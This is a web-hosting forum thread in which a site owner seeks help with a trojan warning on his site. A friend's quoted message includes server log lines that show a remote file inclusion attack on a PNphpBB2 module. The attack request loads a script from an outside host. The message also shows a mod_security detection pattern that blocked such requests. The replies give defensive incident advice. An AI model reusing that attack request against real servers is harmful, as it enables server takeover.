Welcome to the JaguarPC Community
JaguarPC
Sales: (888) 338-5261
Support: (888)-551-3050
Results 1 to 6 of 6

This is a discussion on help! all1count web trojan / downloader in the Shared & Semi-Dedicated forum
My site is infected with this - www.themes.co.nz - i have been told it's not too nasty, but I just can't find where it is! ...

  1. #1
    JPC Senior Member
    Join Date
    Jul 2004
    Posts
    70

    help! all1count web trojan / downloader

    My site is infected with this - www.themes.co.nz - i have been told it's not too nasty, but I just can't find where it is! The warning comes up even if I disable Javascript... can some one help me please!

    I have even tried a find and replace on the the name. but it must be happening before the html/js is output to the browser. It's got me stumped

    TIA

    -lobos

  2. #2
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    You're talking about this, right?

    What are you waiting for? Get over to here and buy em' cause' the time grows short (who know's when Lobos could regain his sanity).
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  3. #3
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Um... you're NOT actually insane, right? Like seeing things?!?!?

    I'm confused! I don't see anything wrong...

    Can you explain the situation a little further?
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  4. #4
    JPC Senior Member
    Join Date
    Jul 2004
    Posts
    70
    Sorry Vin, hahahahahaha I just reread that post (i had to duck out before proofing it properly and I just posted), and I can see where you could have got confused...

    What I meant to do was connect the title of the OP to the info (did you read the title?)... but anyway I am having trouble with the all1count web trojan / downloader everytime I visit a page on themes.co.nz I get a big read apple of a warning from Nod...

    I have ran a find and replace on the actual data output to the browser as I though there was some js code injected somewhere, but it's not - it is coming from somewhere else... I disabled JS and it still runs... it's got me effed where the thing is coming from...

    Any advice or help you could give me would be very much appreciated thank you.

    -Lobos

  5. #5
    JPC Senior Member
    Join Date
    Jul 2004
    Posts
    70
    Well it seems I am effed My friend just sent me this:

    Comments: I sent you a PM at Carls forums, but not
    sure if it made it thru. So I'll send this to you
    here as well.


    --------------------------

    Hi there,

    Visited pn today and saw the news about the phpbb
    exploit then saw your posts...


    I looked at my log and found this:

    212.110.128.68 - - [02/Aug/2007:21:27:01 -0400]
    "GET
    /index.php?name=PNphpBB2&file=viewtopic&p =254/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?
    HTTP/1.1" 200 47287 "-" "libwww-perl/5.803"
    212.110.128.68 - - [02/Aug/2007:21:27:03 -0400]
    "GET
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?
    HTTP/1.1" 200 5 "-" "libwww-perl/5.803"

    If you go to:
    http://usuarios.arnet.com.ar/larry123/safe.txt

    YOu will see some kind of code....

    Hmmmmm...

    Anyway do you have any experience with this type
    of thing?

    Thanks
    Matter of fact I do. Most all server admins do.
    And thats why many are now banning the use of
    any form of phpbb on thier servers. Myself
    included.

    That script in your logs, and MANY others like it,
    give access to your server. Once they are in, all
    hope is lost. Time for a reload of the server, not
    just the site.

    Want to stay safe-er? Install mod security on your
    server with a very strict ruleset, or move to a
    host who has protections in place to help fend off
    these attacks, for you.

    Or better yet, give up on phpbb all together and
    convert out of it.

    http://www.simplemachines.org/download/?converters

    Hard for me to believe you would even still use
    it, I read your posts and felt compelled to send
    you a message.

    2.6 million hits on google.
    http://www.google.com/search?hl=en&q=phpbb+hacked

    Doesn't take a brain surgeon to see the writing on
    the wall bud.

    This below, is what your log should look like. As
    you know I used to run phpbb myself, YEARS ago. I
    do not have any phpbb scripts on any of my
    servers.

    The attacks STILL come, often.



    [Tue Jul 31 13:29:20 2007] [error] [client
    195.242.211.140] mod_security: Access denied with
    code 406. Pattern match
    "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|s h|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x 20?\\\\?"
    at REQUEST_URI [id "390144"][rev "1"] [msg
    "Rootkit attack: Generic Attempt to install
    rootkit"] [severity "CRITICAL"] [hostname
    "www.access.siteshostedby.info"] [uri
    "/archive/index.php//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?"]
    [Tue Jul 31 13:29:21 2007] [error] [client
    195.242.211.140] mod_security: Access denied with
    code 406. Pattern match
    "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|s h|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x 20?\\\\?"
    at REQUEST_URI [id "390144"][rev "1"] [msg
    "Rootkit attack: Generic Attempt to install
    rootkit"] [severity "CRITICAL"] [hostname
    "www.access.siteshostedby.info"] [uri
    "//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?"]
    Hope that helps some. Best of luck.
    So what do I do now?

    -Lobos

  6. #6
    the Windlord Gwaihir's Avatar
    Join Date
    Jun 2002
    Posts
    2,562
    Sorry to hear you got hacked. First, you should IMHO alert support as to what happened. Your hacked account might right now already be used for all sorts of nasty things.. They'll want to put a stop to that, as well as make sure the server as a whole comes to no harm.

    Your friend is right that it is best to restart as cleanly as possible. You could request support to install your account afresh. If you want them to restore from a backup they made (rather than you doing that from your own) there may be a fee though. Then: be sure to upgrade your phpbb (and any other scripts you use) to their latest version right away, even before opening the site to the public.

    Some of the other stuff your friend says is big BS though. To my knowledge there hasn't been a serious exploit for phpbb in a long time, so you must be running a very old version.
    Quote Originally Posted by lobos View Post
    Or better yet, give up on phpbb all together and
    convert out of it.

    http://www.simplemachines.org/download/?converters

    Hard for me to believe you would even still use
    it, I read your posts and felt compelled to send
    you a message.

    2.6 million hits on google.
    http://www.google.com/search?hl=en&q=phpbb+hacked

    Doesn't take a brain surgeon to see the writing on
    the wall bud.
    1.95 million hits on google: http://www.google.nl/search?hl=nl&q=smf+hacked

    Seeing as how SMF hasn't been around nearly as long and has a smaller installed base, those numbers - if they mean anything at all - portray it as a good bit worse than phpbb, not better.

    The point though, is the same for phpbb, SMF or any other popular script: you need to make sure you keep it up to date. Whenever there's a new version out that fixes security issues, update to it, or you WILL find yourself hacked sooner or later.
    Regards,

    Wim Heemskerk
    ---
    Visit MeCCG.net - Cardgaming in J.R.R. Tolkien's Middle-earth
    And Gwaihir.net - The Middle-earth CCG store

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •